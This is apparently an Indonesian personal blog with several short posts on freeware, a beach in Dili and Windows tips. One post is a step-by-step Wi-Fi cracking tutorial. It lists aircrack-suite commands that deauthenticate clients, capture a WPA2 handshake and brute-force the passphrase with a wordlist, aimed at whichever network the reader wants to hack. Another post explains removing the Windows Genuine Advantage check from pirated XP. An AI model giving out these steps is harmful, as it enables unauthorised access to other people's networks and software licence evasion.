Spy Terminator

2 05 2010

Buat yang menggunakan OS windows dan hanya menggunakan anti virus untuk perlindungannya, saya mau sharing aja neh untuk menggunakan spy terminator yang berfungsi memproteksi komputer dari mailware atau pun trojan, disamping gratis bisa update tanpa biaya juga low… suit2 … yang mau tinggal sedot aja neh disini





hack wpa2 psk

2 05 2010

Satu satunya kelemahan wpa2 psk dan wpa adalah ketika sebuah client melakukan koneksi ke AP dimana terjadinya proses handshake, kita bisa melakukan Bruto Force yang akan mencoba satu persatu password yang ada dengan didapatkan dari proses handshake. Melakukan Bruto Force adalah melakukan dengan mengunakan dictionary file yang artinya kita harus mempunyai file berisi passpharase yang akan di coba satu persatu dengan paket handshake untuk mencari keys yg digunakan tersebut.

Ga usah panjang lebar dan basa basi lagi, saya tulis ini supaya saya tidak lupa dengan langkah cara hack wpa2 psk menggunakan Backtrack 4, VM Ware Workstation dan menggunakan windows XP sp2 menurut pengalaman saya. Langkah pertama buat yang mau nyoba silahkan persiapkan laptop, usb wireless, Backtrack 4 yang bisa di download disini serta VM Ware Workstation yang bisa di dowload disini dan jangan lupa rokok malboro merah rek…. hehehehe

Instal VM Ware Workstation, saya menggunakan Windows XP SP2 karena stabil menurut saya setelah itu runing (jalankan) Backtrack 4 yang berupa file ISO menggunakan VM Ware Workstation kemudian tancapkan USB wireles ke laptop dan aktifkan, bagi yang masih bingung bisa liat tutorial di youtube klik disini setelah Backtrack 4 siap lakukan perintah ini di terminal :

  1. root@bt:-# airmon-ng
  2. root@bt:-# airmon-ng stop wlan0
  3. root@bt:-# airmon-ng start wlan0
  4. root@bt:-# airodump-ng wlan0 (disini akan dilihat macam2 wireles yang sedang aktif yang terdeteksi, pilih bssid yg akan di hack yaitu dengan di copy bssid tersebut dan perhatikan bagian ch yaitu berarti chanel yg harus di ingat)
  5. root@bt:-# airodump-ng -c 6 -w zhome –bssid 00:6B:7B:A1:11:8B mon0 (c=chanel dan bssid yang saya cantumkan hanya contoh dan ganti sesuai dengan bssid dan chanel yg mau di hack, setelah itu enter dan tunggu hingga station mengeluarkan semacam bssid setelah itu buka  terminal  kedua dan ketikan)
  6. root@bt:-# aireplay-ng -0 5 -a 00:6B:7B:A1:11:8B -c 89:AS:84:B3:89:7C mon0 (kemudian lihat di terminal pertama dan akan di dapatkan handshake dipojok kanan atas, tekan keyboard ctrl+c)
  7. root@bt:-# aircrack-ng -w /pentest/passwords/wordlists/darkc0de.lst zhome*.cap (darkc0de adalah dictionary passpharase bawaan backtrack 4)

oke selamet mencoba kalau mau nyoba.





Opera 9.50 Portabel

4 05 2009

Opera buat Q sangat membantu, buat browsing and download file2 kecil…..!!

Barusan surfing di OM google, eh nemu yang portabel versi 9.50, bisa disimpen di usb and bisa di pake dimanapun gw suka….!!! tanpa instal lage…!!! yang mao coba silahkan download disini





Beautiful Beach in Dili

29 04 2009

Kalo gie jenuh liat pemandangan kaya gini di Dili, rasanya lepas gitu… ga tau kenapa ya..!!!

cma satu yang ga tahan, puanas nya disini dua kali na pulau jawa…. piuhhhh, bule2 dsini mah sneng bnget kalo panas2 an lah klo kya Q gini,,, mana tahan…. tar item… hikzz…





Cara Menghilangkan Windows Genuine Advantage

25 04 2009

Nah kalo windows xp bajakan di update di internet kaya gini keluarna…..!!!

Cara hilangin na  gampang

  1. Restart komputer
  2. Masuk ke Safe Mode dengan cara tekan F8
  3. Setelah itu masuk ke (Administrator)
  4. Kalo dah masuk windows, klik start, run (ketik di run REGEDIT)
  5. Klik di EDIT, FIND
  6. Ketik di FIND (WGALOGON)
  7. Setelah di search and ketemu folder WGALOGON langsung hapus aja, dengan cara delete yak.. hehehe
  8. Tutup Regedit
  9. Restart komputernya
  10. Finish

gmana dah ilang kan ? GOOD LUCK… semoga bermanfaat… amiee.nnn.





Ci Luk Ba…

23 04 2009

Cilukkkk… Baaaaaa… !!! berbagi





Portable Perfect Uninstaller v5.7

21 04 2009

Temen2 dah pernah ada yang ngalamin susah buang software yang udah di instal di windows xp atau bahkan engga bisa di buang karena gangguan dari sistem windowsnya nah dah coba pake Portable Perfect Uninstaller v5.7 engga perlu diinstal cukup di load dari usb flashdisk, hampir bisa ngebuang semua software yang engga bisa di buang lewat Add or Remove yang udah ada dari bawaan windows xp di tambah lagi Portable Perfect Uninstaller v5.7 udah nyiapin beberapa software dan anti virus yang sering dipakai oleh kebanyakan orang yang pasti hampir 100% bisa dibuang…!!!

sow ga sah ragu kalau mau nyoba silahkan download disini

NB : Bwat temen2 yang udah nyoba tapi tetep ga bisa di buang softwarenya bahkan pakai Portable Perfect Uninstaller v5.7 hehehehe… sow mau ga mau buang nya lewat registry… (manual banget) LOL… kakakakaka..!!!